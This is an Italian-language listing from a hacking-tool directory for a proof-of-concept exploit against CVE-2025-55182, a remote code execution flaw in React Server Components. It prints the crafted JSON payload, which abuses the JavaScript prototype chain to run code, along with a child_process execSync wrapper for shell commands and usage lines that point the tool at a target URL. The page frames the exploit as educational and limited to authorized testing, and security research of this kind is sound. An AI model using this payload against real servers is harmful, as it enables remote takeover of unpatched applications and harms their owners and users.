Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react-ssr-vulnerability — Questo è uno script POC per CVE-2025-55182 (React SSR RCE) | Kitploit
Strumenti/GitHubGitHub/darker-ink/react-ssr-vulnerability
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

Questo è uno script POC per CVE-2025-55182 (React SSR RCE)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
8 mesi faNon ancora revisionato

CVE-2025-55182 - POC RCE per React Server Components

Questo è un POC solo per scopi educativi e di ricerca sulla sicurezza. Questa vulnerabilità è stata risolta nelle ultime versioni dei pacchetti interessati. Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test. Non mi assumo alcuna responsabilità per eventuali azioni legali intraprese contro di te.

Costruzione del Payload

L'exploit crea un oggetto JSON appositamente costruito che abusa della catena dei prototipi di JavaScript:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // Inquina la catena dei prototipi
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Codice malevolo iniettato
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Wrapping dei comandi

Il POC supporta due modalità:

Modalità Standard (predefinita):

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Avvolge i comandi shell per l'esecuzione tramite child_process di Node.js.

Modalità Raw (flag --raw):

root@kitploit:~
// Executes arbitrary JavaScript directly

Consente l'esecuzione diretta di codice JavaScript senza il wrapping di comandi shell.

Utilizzo

Esecuzione di comandi di base

root@kitploit:~
bun run index.ts <command_file> <target_url>

Esempio:

root@kitploit:~
# Crea un file di comando
echo "whoami" > cmd.txt

# Esegui contro l'endpoint vulnerabile
bun run index.ts cmd.txt http://localhost:3000

Modalità JavaScript Raw

root@kitploit:~
bun run index.ts --raw <js_file> <target_url>

Esempio:

root@kitploit:~
# Crea il payload JavaScript
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Esegui JavaScript raw
bun run index.ts --raw payload.js http://localhost:3000

Argomenti

  • <file_path>: Percorso del file contenente il comando o il codice JavaScript
  • <target_url>: URL dell'endpoint della React Server Function
  • --raw: (Opzionale) Esegue JavaScript raw invece dei comandi shell

Attribuzione

Scoperto da: Lachlan Davidson
Divulgato da: The React Team & Meta Security

Riferimenti

  • Advisory di sicurezza ufficiale di React
  • CVE-2025-55182
Scarica lo strumento